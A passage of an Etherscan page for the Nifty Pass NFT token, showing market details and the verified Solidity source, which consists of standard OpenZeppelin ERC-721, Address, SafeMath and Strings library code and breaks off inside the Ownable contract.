ETH Price: $2,919.23 (-7.84%)
Gas: 10 Gwei

Token

Nifty Pass (NIFTYPASS)
 

Overview

Max Total Supply

107 NIFTYPASS

Holders

50

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A

Other Info

Filtered by Token Holder
zerolearn.eth
Balance
1 NIFTYPASS
0x69f21b919283a735568a22c0b34316920f54b7ee
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
NiftyPass

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-01-25
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


pragma solidity ^0.8.0;

/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


pragma solidity ^0.8.0;

/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/utils/[email protected]


pragma solidity ^0.8.0;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize, which returns 0 for contracts in
        // construction, since the code is only stored at the end of the
        // constructor execution.

        uint256 size;
        assembly {
            size := extcodesize(account)
        }
        return size > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return _verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return _verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return _verifyCallResult(success, returndata, errorMessage);
    }

    function _verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) private pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


pragma solidity ^0.8.0;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {

    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File @openzeppelin/contracts/utils/math/SaftMath.sol
pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// File @openzeppelin/contracts/utils/[email protected]



pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


pragma solidity ^0.8.0;







/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension, but not including the Enumerable extension, which is available separately as
 * {ERC721Enumerable}.
 */
contract ERC721 is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to owner address
    mapping(uint256 => address) private _owners;

    // Mapping owner address to token count
    mapping(address => uint256) private _balances;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    /**
     * @dev Initializes the contract by setting a `name` and a `symbol` to the token collection.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        require(owner != address(0), "ERC721: balance query for the zero address");
        return _balances[owner];
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        address owner = _owners[tokenId];
        require(owner != address(0), "ERC721: owner query for nonexistent token");
        return owner;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length > 0 ? string(abi.encodePacked(baseURI, tokenId.toString(), ".json")) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public virtual override {
        address owner = ERC721.ownerOf(tokenId);
        require(to != owner, "ERC721: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        require(_exists(tokenId), "ERC721: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        require(operator != _msgSender(), "ERC721: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        //solhint-disable-next-line max-line-length
        require(_isApprovedOrOwner(_msgSender(), tokenId), "ERC721: transfer caller is not owner nor approved");

        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        require(_isApprovedOrOwner(_msgSender(), tokenId), "ERC721: transfer caller is not owner nor approved");
        _safeTransfer(from, to, tokenId, _data);
    }

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * `_data` is additional data, it has no specified format and it is sent in call to `to`.
     *
     * This internal function is equivalent to {safeTransferFrom}, and can be used to e.g.
     * implement alternative mechanisms to perform token transfer, such as signature-based.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function _safeTransfer(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) internal virtual {
        _transfer(from, to, tokenId);
        require(_checkOnERC721Received(from, to, tokenId, _data), "ERC721: transfer to non ERC721Receiver implementer");
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     * and stop existing when they are burned (`_burn`).
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return _owners[tokenId] != address(0);
    }

    /**
     * @dev Returns whether `spender` is allowed to manage `tokenId`.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function _isApprovedOrOwner(address spender, uint256 tokenId) internal view virtual returns (bool) {
        require(_exists(tokenId), "ERC721: operator query for nonexistent token");
        address owner = ERC721.ownerOf(tokenId);
        return (spender == owner || getApproved(tokenId) == spender || isApprovedForAll(owner, spender));
    }

    /**
     * @dev Safely mints `tokenId` and transfers it to `to`.
     *
     * Requirements:
     *
     * - `tokenId` must not exist.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(address to, uint256 tokenId) internal virtual {
        _safeMint(to, tokenId, "");
    }

    /**
     * @dev Same as {xref-ERC721-_safeMint-address-uint256-}[`_safeMint`], with an additional `data` parameter which is
     * forwarded in {IERC721Receiver-onERC721Received} to contract recipients.
     */
    function _safeMint(
        address to,
        uint256 tokenId,
        bytes memory _data
    ) internal virtual {
        _mint(to, tokenId);
        require(
            _checkOnERC721Received(address(0), to, tokenId, _data),
            "ERC721: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Mints `tokenId` and transfers it to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible
     *
     * Requirements:
     *
     * - `tokenId` must not exist.
     * - `to` cannot be the zero address.
     *
     * Emits a {Transfer} event.
     */
    function _mint(address to, uint256 tokenId) internal virtual {
        require(to != address(0), "ERC721: mint to the zero address");
        require(!_exists(tokenId), "ERC721: token already minted");

        _beforeTokenTransfer(address(0), to, tokenId);

        _balances[to] += 1;
        _owners[tokenId] = to;

        emit Transfer(address(0), to, tokenId);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        address owner = ERC721.ownerOf(tokenId);

        _beforeTokenTransfer(owner, address(0), tokenId);

        // Clear approvals
        _approve(address(0), tokenId);

        _balances[owner] -= 1;
        delete _owners[tokenId];

        emit Transfer(owner, address(0), tokenId);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *  As opposed to {transferFrom}, this imposes no restrictions on msg.sender.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) internal virtual {
        require(ERC721.ownerOf(tokenId) == from, "ERC721: transfer of token that is not own");
        require(to != address(0), "ERC721: transfer to the zero address");

        _beforeTokenTransfer(from, to, tokenId);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId);

        _balances[from] -= 1;
        _balances[to] += 1;
        _owners[tokenId] = to;

        emit Transfer(from, to, tokenId);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(address to, uint256 tokenId) internal virtual {
        _tokenApprovals[tokenId] = to;
        emit Approval(ERC721.ownerOf(tokenId), to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before any token transfer. This includes minting
     * and burning.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, ``from``'s `tokenId` will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 tokenId
    ) internal virtual {}
}


// File @openzeppelin/contracts/access/[email protected]


pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
